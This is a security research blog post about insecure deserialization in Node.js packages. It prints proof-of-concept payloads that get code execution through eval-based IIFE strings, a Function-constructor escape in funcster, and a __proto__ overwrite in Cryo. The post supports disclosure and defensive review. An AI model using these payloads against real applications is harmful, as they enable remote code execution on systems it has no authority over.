At ZeroNights 2017 conference, I spoke about “Deserialization vulnerabilities in various languages”. For my presentation, I used an interesting article about two serialization packages of Node.js. I showed them as examples of vulnerable implementations of deserialization processes. In this post, I’d like to show results of my own research and a new approach of attacking deserialization in JS.
Previous research
The article mentioned above talks about two packages – node-serialize
and serialize-to-js
. Both of them can serialize an object in JSON format, but unlike standard functions (JSON.parse
, JSON.stringify
), they allow the serialization of almost any kind of object, such as Function, for example (i.e in JavaScript, a function is an object too). So, it’s a valid object:
var obj = {
field1: "value1",
field2: function(){
return 1;
}
}
But if we serialize it using JSON.stringify
, we have only:
{ field1: "value1" }
To implement support of all kinds of objects, node-serialize
, internally uses eval
.
{"anything_here":"_$$ND_FUNC$$_function (){сonsole.log(1)}"}
This is what a serialized object with a function should look like. During the deserialization process, anything after a special tag $$ND_FUNC$$
goes directly to eval
function. Therefore, we can use IIFE (as mentioned in the article) or write code directly (as mentioned in the article‘s comment).
With IIFE (Immediately-Invoked Function Expression), all we need to do is add () to a function and it will be automatically invoked just after it will be defined during deserialization.
{"anything_here":"_$$ND_FUNC$$_function (){сonsole.log(1)}()"}
{"anything_here":"_$$ND_FUNC$$_console.log(1)"}
The next example is serialize-to-js
. Although it doesn’t support function as a type, its implementation is still insecure due to the fact that it uses next construction during the deserialization process:
return (new Function('"use strict"; return ' + str))()
where str
is a value under the attacker’s control.
Practically, it’s just a variation of eval
. So we can achieve RCE using the following payload as seen in the following issue:
console.log(`exploited`)
(function (){сonsole.log(1)}())
The safer way?
After my presentation at ZeroNights, I came across a package for serialization from Yahoo. It supports serialization of functions too. However, the package doesn’t include any deserialization functionality and requires you to implement it yourself. Their example uses eval
directly. So I was interested to see if there were any packages supporting function serialization and did not use eval
or similar functions.
Actually, there are a lot of serialization libraries (about 40 or 60). I looked through some of them and found that a safer way of deserialization is to use different constructors depending on an object type.
For example, a package returns new Function(params, body)
for a function, where params and body are taken from specific JSON fields. In this case, the function is reconstructed, however an attacker cannot force its execution.
I’ve also found another vulnerable package funcster. It is vulnerable to the same attack using IIFE as previous ones, so we (as attackers) can execute our code during the deserialization process. Here is an example of a payload:
{ __js_function: 'function testa(){var pr = this.constructor.constructor("return process")(); pr.stdout.write("param-pam-pam") }()' }
The package uses another approach for serialization/deserialization. During deserialization it creates a new module with exported functions from a JSON file. Here is part of the code:
return "module.exports=(function(module,exports){return{" + entries + "};})();";
The interesting difference here is that the standard built-in objects are not accessable, because they are out of scope. It means that we can execute our code, but cannot call build-in objects’ methods. So if we use console.log()
or require(something)
, Node returns an exception like "ReferenceError: console is not defined"
.
However, we can easily can get back access to everything because we still have access to the global context:
var pr = this.constructor.constructor("console.log(1111)")();
Here this.constructor.constructor
gives us Function object, we set our code as a parameter there and call it using IIFE.
Step deeper with Prototype
While I was researching packages, I stumbled upon the idea to look at other approaches of attacks on deserialization, which are used in other languages. To achieve code execution we leverage functions with attacker’s controlled data which are called automatically during the deserialization process or after when an application interacts with a newly created object. Something similar to “magic methods” in other languages.
Actually, there are a lot of packages which work completely differently, still after some experiments I came to an interesting semi-universal attack. It is based on two facts.
Firstly, many packages use the next approach in the deserialization process. They create an empty object and then set its properties using square brackets notations:
obj[key]=value
where key and value are taken from JSON
Therefore we as attackers are able to control practically any property of a new object. If we look through the list of properties, our attention comes to the cool __proto__ property . The property is used to access and change a prototype of an object. This means that we can change the object’s behavior and add/change its methods.
Secondly, a call of some function leads to the invoking of the function arguments’ methods. For example, when an object is converted to a string, then methods valueOf, toString of the object are called automatically (more details here). So, console.log(obj)
leads to invocation of obj.toString()
. Another example, JSON.stringify(obj)
internally invokes obj.toJSON().
Using both of these features, we can get remote code execution in process of interaction between an application (node.js)
and an object.
I’ve found a nice example – package Cryo, which supports both function serialization and square bracket notation for object reconstruction, but which isn’t vulnerable to IIFE, because it properly manages object (without using eval&co
).
Here a code for serialization and deserialization of an object:
cvar Cryo = require('cryo');
var obj = {
testFunc : function() {return 1111;}
};
var frozen = Cryo.stringify(obj);
console.log(frozen)
var hydrated = Cryo.parse(frozen);
console.log(hydrated);
Serialized JSON looks like that. Pretty tangled:
{"root":"_CRYO_REF_1","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {return 1111;}"},{"contents":{"testFunc":"_CRYO_REF_0"},"value":"_CRYO_OBJECT_"}]}
For our attack we can create a serialized JSON object with a custom __proto__
. We can create our object with our own methods for the object’s prototype, but as a small trick, we can set an incorrect name for __proto__
(because we don’t want to rewrite a prototype of the object in our application) and serialize it.
var obj = {
__proto: {
toString: function() {console.log("defconrussia"); return 1111;},
valueOf: function() {console.log("defconrussia"); return 2222;}
}
};
So we get serialized object and rename from __proto
to __proto__
in it:
{"root":"CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\"defconrussia\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT"},{"contents":{"proto":"CRYO_REF_2"},"value":"_CRYO_OBJECT"}]}
When we send that JSON payload to an application, the package Cryo deserializes the payload in an object, but also changes the object’s prototype to our value. Therefore, if the application interacts with the object somehow, converts it to a sting, for example, then the prototype’s method will be called and our code will be executed. So, it’s RCE.
I tried to find packages with similar issues, but most of them didn’t support serialization of function. I didn’t find any other way to reconstruct functions in __proto__
. Nevertheless, as many packages use square bracket notation, we can rewrite __proto__
for them too and spoil prototypes of newly created objects. What happens when an application calls any prototype method of such objects? It may crash due to an unhandled TypeError exception.
In addition, I should mention that the whole idea potentially works for deserialization from any format (not only JSON). Once both features are in place, a package is potentially vulnerable. Another thing is that JSON.parse
is not “vulnerable” to __proto__ rewriting
.
function stringify == eval
While Googling, I came across another approach of serializing objects with fuctions. The idea is to first stringify functions, then to JSON.stringify
the whole object. “Deserialization” consists of the same steps in reverse order. Examples of such function-stringifiers
are packages cardigan
, nor-function
and so on. All(?) of them are insecure (due to eval
& co) and allow code execution using IIFE during unstringifying.
Conclusion
For pentesters: Look closely at square bracket notation and access to __proto__
. It has good potential in some cases.
For developers: I’m writing here that some packages are vulnerable, but your application is only vulnerable when a user’s input comes to the vulnerable function. Some packages are created in such an “insecure” way ion purpose and will not be fixed. So don’t panic, and just check if you depend on a non-standard serialization package and how you handle user’s input in it.
I shared information about both vulnerabilities with their maintainers using HackerOne’s program. A warning message has been added to `funcster` package’s README. We were not able to reach cryo’s developers.
PS: Thanks @lirantal from HackerOne for his cooperation on the above mentioned vulnerabilities.
Frequently asked questions
Serialization is a process that converts a structured data object stored in memory into a certain representative format (JSON, XML, binary, etc.). It is used to store data on disk, transmit via a stream, and more. Deserialization converts serialized data back into a structured data object that is stored in memory used by the application.
If you deserialize data into an object and assume that the data is trusted, the attacker may create serialized data in such a way that the application performs additional malicious operations during the deserialization process, which could lead even to remote code execution – this is a deserialization vulnerability. Some deserialization libraries in programming languages treat input data as safe and, by default, do not protect against such vulnerabilities.
Yes, deserialization vulnerabilities can happen in JavaScript. For example, if you use node-serialize or serialize-to-js packages to serialize to JSON and then back to JavaScript objects, you may easily achieve remote code execution. Many other similar libraries, out of approximately 40 to 60 packages, are vulnerable to insecure deserialization, too.
See a detailed example of hacking the node-serialize package to achieve remote code execution.
The built-in functions (JSON.parse()) are not vulnerable so you can use them safely. However, custom deserialization packages for JavaScript have different types of vulnerabilities, depending on the approach used to deserialize data. Some of these vulnerabilities, however, are the result of the intended library design, so they cannot be fixed. It is your responsibility as a developer to make sure that data that is deserialized is first sanitized.
Get the latest content on web security
in your inbox each week.